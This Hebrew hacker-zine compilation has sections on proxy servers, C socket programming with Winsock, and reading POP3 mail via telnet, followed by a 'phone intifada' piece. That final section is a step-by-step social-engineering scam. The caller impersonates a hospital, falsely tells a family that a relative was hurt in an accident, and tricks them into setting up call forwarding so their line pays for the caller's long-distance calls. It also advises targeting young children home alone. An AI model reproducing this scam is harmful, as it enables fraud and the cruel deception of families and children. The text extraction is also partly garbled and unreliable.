‫בכדי שהמחשב ‪ a‬יוכל ליצור קשר עם המחשב ‪ b‬שעליו נמצא האתר‪ ,‬הוא צריך להתחבר דרך מלא‬
‫מלא‬
‫מחשבים‪ .‬למה? כי ככה‪ .‬כי המחשבים ‪ a‬ו ‪ b‬מרוחקים מאוד מבחינה גיאוגרפית‪ a .‬נמצא בישראל‪,‬‬
‫ו ‪ b‬נמצא באמריקה‪ .‬אז ‪ a‬עושה את הדרך הבאה‪:‬‬
‫‪a-f-u-c-k-t-h-e-g-o-v-e-r-m-e-n-t-b‬‬
‫כלומר‪ ,‬הוא היה צריך להתחבר לכל המחשבים האלה (‪ )fuckthegoverment‬עד שהוא הגיע ל ‪.b‬‬
‫עכשיו‪ ,p ,‬שרת הפרוקסי שלנו‪ ,‬יעזור לנו להגיע לשם יותר מהר‪ .‬למה? כי במקום להתחבר דרך‬
‫כל כך הרבה מחשבים אנחנו עושים את הדבר הבא‪:‬‬
‫‪a-f-u-c-k-p-y -b‬‬
‫כלומר‪ ,‬אחרי ‪ ,fuck‬הוא הגיע לשרת פרוקסי אשר היה צריך להתחבר למחשב יחיד‪ ,y ,‬בכדי להגיע‬
‫ליעד הסופי (‪ ,)b‬מה שקיצר את כל הדרך‪ .‬דמיינו את זה כאילו שבמקום ללכת את כל הסיבוב מהבית‬
‫ספר‬
‫למכולת של יהודה‪ ,‬אתם משתמשים בדרך קיצור וחותכים באמצע‪ .‬כמובן שלפעמים לשרת פרוקסי‬
‫יהיה חיבור מהיר יותר מאשר לשרתים אליהם תתחברו אם לא תשתמשו בו מה שייאץ את החיבור‬
‫עוד יותר‪.‬‬
‫אבל כמובן שזה לא חייב להיות ככה‪ .‬יכול להיות שחיבור דרך שרת הפרוקסי רק ייגרום לחיבורים‬
‫רבים יותר‬
‫ואיטיים יותר ובכך יאט את כל התהליך‪ .‬בשביל להבין את זה דמיינו שבמקום ללכת ישר לבית של‬
‫אלי‬
‫אתם צריכים עכשיו לעשות את כל הסיבוב כי קודם אתם צריכים לעבור דרך הבית של מיכל שהיא‬
‫בעצם‬
‫שרת הפרוקסי ובגללה הכל נהיה יותר ארוך ואיטי‪ .‬כוס אימא של מיכל‪ ,‬תראו מה היא עושה‪.‬‬

‫אסור לעבור דרך הבית שלה‪ .‬מיכל‪ ,‬תסתכלי למה את גורמת‪.‬‬
‫עכשיו בקשר לאנונימיות‪,‬‬
‫כשאתם מתחברים לאתר בדרך הרגילה‪" ,‬ישירות"‪ ,‬מספר האיי פי שלכם נקלט לשרת‪.‬‬
‫אבל כשאתם מתחברים דרך שרת הפרוקסי‪ ,‬מספר האיי פי של הפרוקסי נקלט במקום!!!‬
‫זה יכול להיות יעיל במקרים רבים ומרובים ואדומים וכחולים וגם צהובים אם בא לכם‪.‬‬
‫אבל מה זה איי פי?‬
‫כל פעם שאתם מתחברים לאינטרנט המחשב שלכם מקבל כתובת ‪.ip‬‬
‫‪ ip‬זה בעצם קיצור ל ‪ ,internet protocol‬אותו פרוטוקול שאחראי להעברת המידע‪.‬‬
‫אבל את זה אתם לא צריכים לדעת‪ .‬מה שכן‪ ,‬מספר איי פי או כתובת איי פי זה מעין‬
‫מספר זיהוי של המחשב שלכם‪ .‬בחיבור מודם רגיל‪ ,‬כל פעם שאתם מתחברים לאינטרנט כתובת‬
‫האיי פי שלכם תשתנה‪ .‬בכדי לבדוק מה כתובת האיי פי שלכם ברגע זה לחצו על תפריט ההתחל‪,‬‬
‫בחרו בהפעלה והקלידו‪winipcfg :‬‬
‫לחצו על מקש ה ‪ enter‬וחלון חדש יופיע‪.‬‬
‫הסתכלו בתיבה של ה ‪ .ip address‬יופיעו בה ארבעה מספרים מופרדים בנקודה‪.‬‬
‫אם אינכם מחוברים כרגע לאינטרנט‪ ,‬הכתובת תהיה ‪127.0.0.1‬‬
‫עכשיו‪ ,‬אחרי שקראתם את כל הזיבולים שלי על שרתי הפרוקסי‪ ,‬אתם בטח מתים להתחבר כבר‬
‫לאחד‪.‬‬
‫את האמת‪ ,‬אתם בטח מתים משעמום‪ ,‬וכבר לא בא לכם לקרוא את זה אבל מה עוד כבר יש לכם‬
‫לעשות עכשיו?‬
‫בכל מקרה‪ ,‬מאינטרנט אקספלורר (‪ ,)internet explorer‬בחרו את התפריט ‪ tools‬ובחרו‬
‫ב ‪ .internet options‬ייפתח לכם חלון חדש על המסך עם שישה תפריטים למעלה‪:‬‬
‫‪general, security, content, connections, programs, advanced‬‬
‫לחצו עם העכבר על תפריט ה ‪.connections‬‬
‫עכשיו חיפשו כפתור שכתוב עליו ‪settings...‬‬
‫לחצו על הכפתור‪.‬‬
‫חפשו איפה שכתוב את המילים ‪.proxy server‬‬
‫תדאגו שהתיבה מתחת שבה כתוב ‪ use a proxy server‬תהיה מסומנת‪.‬‬
‫אם היא לא מסומנת‪ ,‬סמנו אותה עכשיו‪ .‬כעת נשאר לכם רק למלא את שני תיבות הטקסט למטה‪.‬‬
‫התיבה הראשונה היא ‪ .address‬פה אתם כותבים את כתובת שרת הפרוקסי‪.‬‬
‫התיבה הבאה שלנו היא ‪ .port‬כאן אתם כותבים את מספר הפורט שבו שרת הפרוקסי פתוח‪.‬‬
‫זה בד"כ יהיה ‪ 8080‬או ‪ 8000‬אבל ממש ממש לאו דווקא‪.‬‬
‫אחרי שאתם ממלאים את שני התיבות האלה אתם פשוט לוחצים על כפתור ה ‪.ok‬‬
‫ושוב‪ ,‬לחצו עוד פעם על כפתור ה ‪.ok‬‬
‫אז איפה לעזאזל אתם מוצאים שרת פרוקסי? ואיך אתם יודעים באיזה פורט הוא פתוח?‬
‫ובכן‪ ,‬בד"כ לספק האינטרנט שלכם יהיה שרת פרוקסי‪ ,‬תשאלו אותם‪ .‬אני בטוח שהם ישמחו לעזור‪.‬‬
‫אם אתם משתמשים בבזק בינלאומי לדוגמא‪ ,‬שרת הפרוקסי הוא‪proxy.bezeqint.net :‬‬
‫ומספר הפורט הוא‪8080 :‬‬
‫חוץ מזה יש אלפי אתרים המפרסמים שרתי‬
‫פרוקסי הפתוחים לציבור הרחב‪ .‬שני אתרים כאלה הם‪:‬‬
‫‪http://proxys4all.cgi.net/public.shtml‬‬
‫‪http://tools.rosinstrument.com/cgi-bin/fp.pl/showlines?lines=200&sortor=3‬‬
‫וזהו‪ .‬אני יודע שיצא קצת חרא של כתבה אבל כתב אותה חרא של בנאדם (אם בכלל אפשר לקרוא לי‬
‫בנאדם)‪,‬‬
‫אז למה ציפיתם?‬

‫שלכם‪ ,‬של אימא שלי‪ ,‬של אבא שלי‪ ,‬של סבא שלי‪ ,‬של סבתא שלי‪ ,‬של אלוהים (שלא קיים)‪,‬‬
‫של המדינה‪ ,‬של השלטון‪ ,‬של העולם‪ ,‬של חברה שלי‪ ,‬וחברים שלי‪ ,‬וידידים שלי‪ ,‬וידידות שלי‪,‬‬
‫של המחשב שלי‪ ,‬ושל כל מה ששלי‪ ,‬וכל מה שלא שלי‪,‬‬
‫‪gehenom‬‬

‫התקשרויות מחשבים‪ :‬חלק ראשון‪:‬‬
‫איך לבנות סרבר‬

‫"שני דברים הם אינסופיים‪ :‬היקום והטמטום" (איינשטיין)‬
‫טוב אז ככה‪:‬‬
‫הכתבה הזאת לא מיועדת למתחילים או לאנשים רעים כמוכם שמשתמשים בנטבאס או בסאב ‪ 7‬או‬
‫בדברים דפוקים כאלה כדי להרגיש שהם "האקרים מגניבים"‪ .‬אז קודם כל‪ ,‬רק שתדעו ש"האקרים‬
‫מגניבים" כמעט ולא קיימים בגלל שאנשים כמוכם משתמשים בתוכנות‪ .‬בואו נהיה יותר חכמים‬
‫ובמקום להוריד אקספלוייט ‪ -‬נתכנת אותו‪.‬‬
‫אז למי המדריך הזה כן מיועד? קודם כל למי שלא הפסיק לקרוא פה‪  ..‬אני לא הולכת עכשיו ללמד‬
‫אתכם שפת ‪ c‬כי ככה‪ ,‬אבל אם יש לכם ידע בשפה‪ ,‬אפילו בסיסי‪ ,‬זה יכול להיות הבסיס לכתיבת‬
‫אקספלוייטים בעתיד‪.‬‬
‫היי‪ ,‬בבקשה אל תצפו ממני ליותר מדי כי מה שאני יודעת על הנושא כתבתי פה‪ .‬אז ככה שאני עוד לא‬
‫יכולה ללמד אתכם איך לבנות אקספלוייט‪ ,‬אבל‪ ,‬גם זה יבוא… ‪‬‬
‫יאללה לעניין‪:‬‬
‫זוכרים את מבנה ‪ 7‬השכבות של ‪ ?osi‬הבסיס של ‪ ?tcp/ip‬אם כן‪ ,‬אז מה שאנחנו הולכים לעשות עכשיו‬
‫זה ‪ low level programming‬שזה תכנות בשלוש רמות הנמוכות יותר‪ .‬איבדתם אותי? לא נורא‪ ,‬זה‬
‫לא כזה חשוב כרגע‪.‬‬
‫אז איך בעצם מחשבים מתקשרים ביניהם? דרך ‪.sockets‬‬
‫‪ socket‬זה מן "שקע" שדרכו עוברת אינפורמציה‪ .‬כל מה שאתם עושים באינטרנט‪ ,‬גורם לפתיחת‬
‫התקשרויות ‪ .sockets‬נניח שאתם כותבים בשורת הפקודה בדוס‪telnet 156.76.119.7 23 :‬‬
‫בעצם על האייפי המבוקש (במקרה הזה ‪ )156.76.119.7‬נמצאת מן תוכנה (‪ )daemon‬שמחכה‬
‫להתקשרות‪ .‬ברגע שמישהו מבקש להתחבר לאותו פורט (במקרה הזה ‪ )23‬תפקיד התוכנה הוא לאשר‬
‫לו את ההתקשרות ולהגיב על פקודות שהוא נותן‪.‬‬
‫מחשב שנמצא במצב "האזנה" (‪ )listening‬להתקשרויות נכנסות‪ ,‬נקרא "שרת" או ‪.server‬‬
‫המחשב שלכם‪ ,‬שבמקרה הזה שולח בקשה להתקשרות ופקודות לשרת נקרא "לקוח" או ‪.client‬‬
‫כל ההתקשרות שביניהם‪ ,‬מהרגע שהלקוח שולח בקשה להתחברות‪ ,‬ועד שהלקוח או השרת סוגר את‬
‫ההתקשרות נעשית דרך‪...‬‬
‫‪): !!sockets‬‬
‫בואו נכנס קצת יותר לעומק‪ .‬נניח שאני רוצה לבנות תוכנת שרת‪ ,‬איזה פקודות אני אצטרך? קודם כל‬
‫פקודות אתחול של ה‪ sockets‬שאני אכניס לתוכם הגדרות מסוימות‪ ,‬שתלויות באופן ההתקשרות‬
‫שלי‪ .‬נצטרך גם פונקציות אתחול של ‪ winsock‬אם אנחנו עובדים עם ‪.windows9x‬‬
‫זאת פקודת האתחול של הסוקטים בווינדוז‪:‬‬
‫;‪wsadata info‬‬
‫(‪if )wsastartup)makeword)1,1(, &info( != 0‬‬
‫;(‪messagebox)null, "cannot initialize winsock!", "wsastartup", mb_ok‬‬
‫עכשיו ניצור מופעים (ארגומנטים) של המבנה ‪ sockadrr_in‬שמכיל את הגדרות הסוקט‪:‬‬
‫;‪struct sockaddr_in my_addr, rmt_addr‬‬
‫המבנה נראה כך‪:‬‬
‫‪struct sockaddr_in‬‬
‫{‬
‫‪*/‬‬

‫‪sin_family; /* address family‬‬

‫‪short int‬‬

‫‪unsigned short int sin_port; /* port number‬‬
‫‪*/‬‬
‫‪struct in_addr sin_addr; /* internet address‬‬
‫‪*/‬‬
‫‪unsigned char sin_zero[8]; /* same size as struct sockaddr */‬‬
‫;}‬
‫‪struct in_adrr‬‬
‫{‬
‫;‪unsigned long s_addr‬‬
‫;}‬
‫בכל מקרה זה לא צריך לעניין אותנו‪ .‬מה שאנחנו צריכים לעשות זה פשוט ליצור מופעים של המבנה‬
‫שיכילו את ההגדרות‪.‬‬
‫נכניס אותן‪:‬‬
‫;‪my_addr.sin_family = af_inet‬‬
‫;(‪my_addr.sin_port = htons)myport‬‬
‫;‪my_addr.sin_addr.s_addr = inaddr_any‬‬
‫השורה הראשונה מודיעה לו שאנחנו רוצים לעבוד עם האינטרנט‪ .‬בשורה השניה אנחנו מכניסים לו‬
‫פורט (הפונקציה ‪ htons‬זה כדי לתרגם את הפורט לסדר שונה של ביטים‪ ,‬כמו שסוקטים אוהבים)‪.‬‬
‫בשורה השלישית אנחנו מכניסים אייפי‪ ,‬במקרה הזה זה הלוקאל (יענתו המחשב שלנו) שאנחנו נפתח‬
‫אח"כ להאזנה‪ inaddr_any .‬מוצא את הלוקאל אייפי‪ .‬אם נרצה להכניס אייפי אחר נצטרך להמיר את‬
‫הקידוד‪ ,‬ויש כמה פקודות שמטפלות באייפי ולכן אני סומכת עליכם שתקראו את המדריך באנגלית‪,‬‬
‫שם כתוב הכל‪.‬‬
‫נגדיר כמה סוקטים (זה טיפוס ‪ integer‬רגיל)‪:‬‬
‫;‪int socklstn, sockrcvd‬‬
‫;(‪socklstn = socket)af_inet,sock_stream,0‬‬
‫נצטרך כמובן להגדיר לו על איזה פורט אנחנו רוצים שהשרת "יאזין" (יחכה להתקשרויות)‪ ,‬אחרת‬
‫‪.‬הוא סתם ישב על איזה פורט רנדומלי‬
‫;((‪bind)socklstn,)struct sockaddr *(&my_addr, sizeof)struct sockaddr‬‬
‫‪ socklstn‬זה הסוקט המבוקש‪ struct sockaddr *(&my_addr( ,‬זאת המרה שצריך לעשות מהמבנה‬
‫של ‪ sockarr_in‬למבנה ‪ sockaddr‬שהיה לפניו‪ ,‬כי ‪ c‬לא מכירה במבנה ‪ .sockaddr_in‬הפרמטר‬
‫האחרון הוא הגודל של המבנה ‪.sockaddr‬‬
‫צריך גם להגיד כמה התקשרויות אנחנו רוצים שהשרת יאפשר‪ .‬לדוגמה‪ ,‬אפשר להגדיר שרק ‪ 4‬לקוחות‬
‫יוכלו לבקש להתחבר לשרת‪ .‬אח"כ השרת לא מתיר יותר התחברויות‪ .‬ברגע שלקוח מתנתק מהשרת‪,‬‬
‫הלקוח הבא יכול להתחבר‪)first in first out( .‬‬
‫טוב אז עכשיו הכל מוכן ואנחנו מאזינים לבקשות לקוחות‪ .‬אם אנחנו מוצאים אחת כזאת‪ ,‬נודיע‬
‫לשרת שיקבל את הבקשה‪.‬‬
‫;(‪listen)socklstn, backlog‬‬
‫‪ socklstn‬זה לאיזה סוקט הוא מאזין‪ ,‬ו ‪ backlog‬הוא מספר ההתקשרויות המותר‪.‬‬
‫התקבלה בקשה‪ .‬מה עושים אייתה?‬
‫;(‪sin_size = sizeof)struct sockaddr_in‬‬
‫;)‪sockrcvd = accept)socklstn, &rmt_addr, &sin_size‬‬
‫השורה הראשונה היא פשוט הגודל של המבנה ‪ sockaddr_in‬שהשורה השניה צריכה‪.‬‬
‫השורה השניה מקבלת את הבקשה שהתקבלה ב‪ socklstn. rmt_addr‬זה משתנה מסוג מצביע שיכיל‬
‫את הפרטים של הכתובת שמבקשת התחברות‪.‬‬
‫כל הבקשה הזאת נכנסת לתוך ‪ .sockrcvd‬מה שקורה בעצם‪ ,‬זה שהשרת מאזין על סוקט אחד (‬

‫‪ )socklstn‬אבל ברגע שיש בקשה הוא פותח סוקט אחר (‪ )sockrcvd‬כדי לקבל אותה‪ .‬כל מה שיועבר‬
‫ביניהם יעבור דרך ‪!!!sockrcvd‬‬
‫השרת ממשיך להאזין על ‪ !!!socklstn‬אם תבוא בקשה אחרת (תלוי כמה בקשות התרנו) הוא יפתח‬
‫סוקט אחר לאותה בקשה וכן הלאה‪.‬‬
‫זהו‪ ,‬מרגע שהשרת קיבל את הבקשה אפשר להתחיל להעביר אינפורמציה בין שניהם‪.‬‬
‫אם רוצים לסגור את הסוקטים‪ ,‬פשוט מאוד‪:‬‬
‫(‪shutdown)socklstn,3‬‬
‫או‪:‬‬
‫;(‪close)socklstn‬‬
‫חשוב לציין ‪ -‬כל הפקודות מחזירות ‪ 1-‬במקרה של שגיאה‪ ,‬ומפעילות את ‪.errno‬‬
‫זהו לבנתיים‪ .‬מאוד בקצרה‪ .‬כדאי מאוד לקרוא את המדריך באנגלית שמפרט את כל הפקודות‪.‬‬
‫שלכם‪,‬‬
‫‪zero cool, aka blood runner.‬‬

‫התקשרויות מחשבים‪ :‬חלק שני‪:‬‬
‫איך לבנות קליינט‬
‫“ ‪.”if man is one, and devil is six, then that must make me seven‬‬
‫(כתובת על שולחן בי"ס)‬
‫אהלןןןן לכם קוראים מתוקים ויקרים שלי‪ .‬או לפחות אלה ששרדו את החלק הקודם‪ .‬בואו נמשיך?‬
‫‪ ‬אז קודם כל‪ ,‬חדשוווות ‪ -‬אני שמחה לבשר לכם כי גם השנה ייערך כנס האקרים בישראל אבל יותר‬
‫צנוע משנה שעברה‪ ,‬כי שנה שעברה זה היה עולמי‪ ,‬נמשך ‪ 3‬ימים‪ ,‬והיו אתגרים כמו הרצאות באנגלית‬
‫במבטא עברי ואפילו גרמני וכל העסק עלה ‪ .60$‬בנות נכנסו בחינם היהיהיהיי תקנאו‪ .‬השנה זה יהיה‬
‫כנראה יום אחד‪ ,‬ישראלי ואפילו יותר נחמד‪ .‬בפעם הקודמת ההרצאות היו בלתי מובנות לחלוטין‬
‫ומשעממות‪ ,‬אבל היו אחלה חבר'ה‪ .‬השנה תוכלו לפגוש אותי! זה כבר סיבה טובה לבוא!!! אז כל‬
‫מעריציי‪ ,‬יאללה‪.‬‬
‫טוב‪ ,‬לעסק‪:‬‬
‫בחלק הקודם למדנו איך להאזין להתקשרויות‪ .‬בחלק הזה נלמד גם איך להתקשר למחשבים אחרים‪.‬‬
‫נניח שהסרבר מהפעם הקודמת מקשיב על פורט מסויים‪ .‬עכשיו בואו נתקשר לפורט הזה וננסה‬
‫לשלוח הודעה‪.‬‬
‫בוא נחשוב כמו בפעם הקודמת‪ ,‬מה יהיה תהליך העבודה שלנו?‬
‫דבר ראשון‪ ,‬לאתחל את ‪ winsock‬במקרה ואתם אנשים מסכנים כמוני שהלינוקס המסכן שלהם‬
‫מסרב להכיר במודם והעלים גם כונן של ‪ 2‬ג'יגה כי מרוב שהמשתמשת התלהבה היא שכחה להגדיר‬
‫אותו כמחיצת וינדוס‪.‬‬
‫פקודת האתחול‪ ,‬להזכירכם‪:‬‬
‫‪;wsadata info‬‬
‫‪)if )wsastartup)makeword)1,1(, &info( != 0‬‬
‫‪;)messagebox)null, "cannot initialize winsock!", "wsastartup", mb_ok‬‬
‫כמובן‪ ,‬נצטרך להגדיר מופעים של המבנה ‪ sockaddr_in‬וליצור טיפוס מסוג שלם בשביל הסוקט‪:‬‬
‫‪;int sockfd‬‬
‫‪;struct sockaddr_in dest_addr‬‬
‫;]‪char msg[81‬‬
‫‪ dest_addr‬יכיל את פרטי הכתובת שאנחנו רוצים להתחבר אליה‪.‬‬
‫הפרמטר האחרון הוא מערך‪ ,‬שיכיל את ההודעה שאנחנו רוצים לשלוח‪.‬‬
‫כמו בפעם הקודמת‪:‬‬
‫‪;)sockfd = socket)af_inet,sock_stream,0‬‬
‫‪;dest_addr.sin_family = af_inet‬‬
‫‪;)dest_addr.sin_port = htons)myport‬‬
‫‪;)dest_addr.sin_addr.s_addr = inet_addr)ip‬‬
‫שזה אומר שאתחלנו את הסוקט שישמש אותנו להתחברות‪ ,‬והכנסנו לתוכו הגדרות שאומרות שאנחנו‬
‫עובדים עם האינטרנט‪ .‬הוא ינסה להתחבר לפורט ‪ myport‬באייפי ‪.ip‬‬
‫הפקודה ‪ )inet_addr)ip‬נחוצה כי צריך להמיר את המספר ‪ ,ip‬לדוגמה‪ 207.23.45.666 :‬לסימון של‬
‫נקודות ומספרים (‪ )numbers-and-dots notation‬כי זה מה שהמחשב מבין‪.‬‬
‫ו‪-‬ע‪-‬כ‪-‬ש‪-‬י‪-‬ו גבירותיי ורבותיי‪ ,‬הרגע שכולכם חיכיתם לו…‬
‫‪;)connect)sockfd, )struct sockaddr *(&dest_addr, sizeof)struct sockaddr‬‬

‫מה זה אומר? התוכנית הנחמדה שלנו מנסה עכשיו להתחבר‪ .‬לצורך זה היא תשתמש ב‪ sockfd‬שזה‬
‫הסוקט שאיתו אנחנו עובדים‪ dest_addr .‬אמרנו כבר שיכיל את פרטי הסרבר (הכתובת אליה אנחנו‬
‫רוצים להתחבר) ו‪ sizeof‬כמו שאתם בטח יודעים‪ ,‬יחזיר פשוט את גודל המבנה ‪ .sockaddr‬ככה‬
‫הולכת הפקודה‪ ,‬היא צריכה גם את הגודל‪.‬‬
‫עכשיו בואו נשלח את ההודעה‪:‬‬
‫‪;)gets)msg‬‬
‫לקליטת הודעה מהמשתמש (מהמקלדת)‪.‬‬
‫‪;)send)sockfd,msg,strlen)msg(,0‬‬
‫הפקודה שולחת את ההודעה ‪ msg‬דרך הסוקט ‪ sockfd‬אל הכתובת שהגדרנו מקודם בהגדרות של‬
‫‪ sockfd )dest_addr(, strlen‬זה כמובן גודל ההודעה שהכרחי בעבודה עם סוקטים‪ ,‬וה ‪ 0 -‬המעצבן‬
‫פשוט צריך להיות שם‪.‬‬
‫לסגירת ההתקשרות‪ ,‬הפקודה שהכרנו כבר בחלק הקודם‪:‬‬
‫‪;)shutdown)sockfd,3‬‬
‫וזאת תורת הסוקטים בקצרה‪ .‬קל‪ ,‬נכון?‬
‫סיכום קצר כדי לעשות סדר בדברים‪:‬‬
‫למדנו איך לבנות תוכנית הנקראת סרבר‪ .‬כדי לבנות סרבר פתחנו ‪ socket‬להאזנה להודעות נכנסות‬
‫על פורט מסויים‪ .‬למדנו איך לבנות קליינט‪ ,‬שכדי לתקשר עם סרברים משתמש ב ‪ socket‬לשליחת‬
‫בקשות התקשרות לפורט מסויים‪ .‬אם הסרבר מאזין לפורט ‪ 23‬לדוגמה‪ ,‬והקליינט מבקש להתחבר‬
‫לפורט ‪ ,23‬הסרבר יקבל את הבקשה שלו ויפתח עבור ההתקשרות ‪ socket‬חדש‪ .‬דרך הסוקט הזה‬
‫הקליינט והסרבר שלנו ידברו ויקשקשו יחדיו עד שאחד הצדדים יסגור את ההתקשרות‪ .‬הקליינט יכול‬
‫לשלוח הודעה לסרבר והסרבר לקליינט‪ .‬לדוגמה‪ ,‬אם אנחנו על שרת דואר (פורט ‪ )25‬ואנחנו מקישים‪:‬‬
‫“‪ ”mail from: bill_gates@microsoft.com‬השרת יכול לבקש הזדהות קודם “‪polite people say‬‬
‫‪"helo first‬‬
‫ולסרב להגיב עד שנקיש לדוגמה‪. helo netvision.net.il ,‬‬
‫אם אתם עדיין מבולבלים קצת‪ ,‬במדריך הבא אני אתן תוכנית שלמה שמשחקת עם הקליינט והסרבר‬
‫ואנסה להסביר אותה‪ .‬אולי אפילו ננתח אקספלוייט אחד או שניים‪ .‬בקיצור‪ ,‬יש למה לחכות…‬
‫חשוב לציין ‪ -‬כל הפקודות מחזירות ‪ 1-‬במקרה של שגיאה‪ ,‬ומפעילות את ‪.errno‬‬
‫סיימתי את שלי להערב‪ .‬יאללה צ'או‪ .‬נתראה בקרוב‪ ,‬מבטיחה‪.‬‬
‫שלכם‪,‬‬
‫‪.zero cool, aka, blood runner‬‬

‫קריאת ‪ e-mail‬דרך טלנט‬
‫ש‪-‬ל‪-‬ו‪-‬ם חברים שלי!‬
‫מה המצב?‬
‫הכל אחלה? סבבה‪ .‬אצלי לא‪ .‬סתם‪ .‬אני במצב רוח מוזר ולכן אני אכתוב לכם מדריך מוזר על איך‬
‫לקרוא אימייל דרך טלנט‪ .‬וברקע יש לי גם דיסק מוזר ("‪ "bleach‬של נירוונה ‪ -‬נחמד‪ ..‬אבל לא יותר‬
‫מנחמד) ואני סתם מזבלת לכם את השכל אז יאללה לעבודה‪...‬‬
‫אז נכון שתמיד חשבתם שיש לכם "אימייל נייד" כמו הוטמייל‪ ,‬אימייל‪.‬קום וכו' ו"אימייל של הבית"‬
‫שכשאתם מתחברים מהבית אתם פותחים אותו דרך אאוטלוק אקספרס וכו'? אז יופי‪ .‬אבל ידעתם‬
‫שאפשר לפתוח אותו לא רק מהבית? בטח שידעתם! אבל ידעתם גם איך לעשות את זה? נו בשביל מה‬
‫אני פה???? ‪):‬‬
‫טוב תפתחו את טלנט (‪ )telnet‬ותתחברו לפורט ‪ 110‬אל השרת אימייל נכנס של הספק שלכם‪ .‬אם אתם‬
‫לא יודעים את הכתובת‪ ,‬תתקשרו לספק ותשאלו‪ .‬אם יש לכם את הדפים ששלחו לכם כשעשיתם מנוי‬
‫אינטרנט‪ ,‬צריך להיות כתוב שם בתצורה של איך לסדר את התיבת אימייל‪ .‬אני לדוגמה על אינטרנט‬
‫זהב‪ ,‬אז ב ‪ hostname‬אני כותבת‪:‬‬
‫‪in.inter.net.il‬‬
‫שזה השרת לאימייל נכנס שלהם‪ .‬אגב‪ ,‬השרת לאימייל יוצא הוא‪ ,‬כמה מפתיע‬
‫‪out.inter.net.il‬‬
‫פורט ‪ 110‬זה הפורט לאימייל נכנס‪.‬‬
‫אוקי‪ ..‬התחברנו‪ .‬מה עכשיו? טוב‪ ,‬זאת היתה הבעיה שלי במשך כמה שנים כי פשוט אין שם את‬
‫הפקודה‬
‫‪ help‬או ? או ‪man‬‬
‫כדי לתת רשימת פקודות!!! ותנסו בעצמכם לחפש באלטה‪-‬ויסטה ולא תמצאו כלום‪ .‬אז למזלי פגשתי‬
‫מישהו שידע את הפקודות והנה הן‪:‬‬
‫‪user username‬‬
‫תכניסו במקום ‪ username‬את שם המשתמש שלכם‬
‫‪pass password‬‬
‫תכניסו במקום ‪ password‬את הסיסמת התחברות שלכם‪.‬‬
‫עכשיו בחלק מהשרתים הוא ישר ייתן לכם רשימה של אימיילים שקיבלתם זה יראה ככה‪:‬‬
‫‪5736 1‬‬
‫‪57362 2‬‬
‫‪3822 3‬‬
‫זה אומר שיש לכם ‪ 3‬אימיילים חדשים‪ .‬כדי לקרוא אותם‪ ,‬רשמו‬
‫‪retr 1‬‬
‫כדי לקרוא את הראשונה‬
‫‪retr 2‬‬
‫כדי לקרוא את השניה וכו'‪.‬‬
‫השרת של אינטרנט זהב לדוגמה‪ ,‬אחרי שאתם מקישים שם משתמש וסיסמה ייתן לכם הודעה כזאת‪:‬‬
‫‪mail list drop and ready‬‬
‫ותצטרכו להקליד‬
‫‪list‬‬
‫כדי לראות את רשימת ההודעות‪ .‬אם אין לכם אימיילים חדשים השרת ייתן את ההודעה‬
‫‪scan list follows‬‬
‫‪.‬‬
‫טוב‪ .‬אם האימייל עובר מהר מדי ואתם לא מצליחים לקרוא אותו‪ ,‬פשוט תבחרו בתפריט‬
‫‪terminal> start logging‬‬
‫ותבחרו קובץ שאליו הוא יכתוב‪ .‬אח"כ לכו לקובץ ותקראו משם‪.‬‬
‫אם אתם רוצים למחוק הודעות‪,‬‬

‫‪dele 1‬‬
‫‪dele 2‬‬
‫וכדומה‪.‬‬
‫סיימתם עם האימיילים? סגרו בעזרת‬
‫‪quit‬‬
‫טוב‪ ,‬לכתוב אימיילים דרך פורט ‪ 25‬אתם יודעים כבר כי זה גיהנום לימד אתכם‪.‬‬
‫אם אתם רוצים ללמוד עוד על טלנט ופורטים שימושיים‪ ,‬לכו ל‬
‫‪www.happyhacker.org‬‬
‫אתר מומלץ ביותר! חפשו את ה‬
‫‪.guides to mostly harmless hacking‬‬
‫אבל מה שהסברתי פה אני לא מצאתי באף מקום‪ .‬אז תרגישו מיוחדים‪...‬‬
‫ביי לכם מתוקנים שלי ותרגישו טוב‬
‫"‪"all tied up and dried up forever, all fucked up and dead to the world‬‬
‫‪): the coolest zero on earth‬‬
‫או‬
‫‪blood runner‬‬
‫בשבילכם‪.‬‬

‫אינטיפדאת טלפונים‬
‫לפני כמה זמן ראיתי (נראה לי בפורום של ‪ ) ihc‬הודעה כזאתי‪:‬‬
‫אינטיפדאת טלפונים‬
‫שמעתי שיש אנשים שמתקשרים למספר טלפון מבקשים ממי שמרים את השפופרת לחייג‬
‫קוד מספרי מסויים ואחרי זה הם עושים שיחות על חשבונו‪.‬‬
‫מישהו יודע מהו הקוד ואיך משתמשים בו ?‬
‫אז ישבתי וחשבתי קצת ובסוף עליתי על זה‪ .‬הטריק לא ייתן לך לעשות שיחות לגמרי‬
‫בחינם אלא ייתן לך לעשות שיחות חוץ במחיר של שיחות מקומיות‪.‬‬
‫כל העניין מבוסס על שימוש ב ‪( *71‬עקוב אחרי)‬
‫אז קודם כל נצטרך להבין איך בזק מחייבת על השרות‪.‬‬
‫נגיד שאני גר בבית א ועשיתי עקוב אחרי לבית ב ‪ .‬בנדם מטלפון ג מתקשר‬
‫אלי ‪ ,‬את התשלום על השיחה מ ג לבית שלי ( א ) המתקשר ישלם אבל על המשך‬
‫השיחה מהבית שלי למקום שעשיתי אליו עקוב אחרי אני משלם‪.‬‬
‫ועכשיו לקטע המעשי בואו נאמר שאני באזור ‪ 04‬ורוצה להתקשר‬
‫למספר טלפון הזה ‪ 029765432 -‬אני פותח ספר טלפנים ורואה את הדבר הבא‪:‬‬
‫ירון וחנה לוי ………………………………… ‪0481234567‬‬
‫אז אני יחייג ‪ 81234567‬והשיחה תלך בערך ככה‪:‬‬
‫אני‪ :‬שלום אני מדבר עם משפחתו של ירון לוי?‬
‫האדיוט שענה לי ‪ :‬כן‬
‫אני‪ :‬שלום ‪ ,‬מדברים מבית החולים רמב"ם ירון נפגע בתאונת דרכים‬
‫אם אתם רוצים לדבר עם הרופא עליכם לחייג ‪. *71029765432‬‬
‫האידיוט שענה לי ‪ :‬טוב אני עכשיו מתקשר‬
‫אני ‪ :‬תודה ולהתראות‪.‬‬
‫******************************************************‬
‫טיפ‪ :‬אם השגתם איזה שהו עותק של רשומון‬
‫תוכלו להוסיף עוד פרטים כדי שהעניין יהיה יותר משכנע‬
‫******************************************************‬
‫*********************************************************‬
‫עוד טיפ ‪ :‬רק ילדים קטנים יהיו מספיק טיפשים‬
‫להאמין לכם אז תתקשרו בשעות שהורים לא אמורים להיות בבית‬
‫*********************************************************‬
‫עכשיו אחרי שעשית את כל העניין המשעמם הזה אתה יכול‬
‫להתקשר פשוט ל ‪ 81234567‬ואז אתה תופנה אוטומטית ל ‪. 029765432‬‬
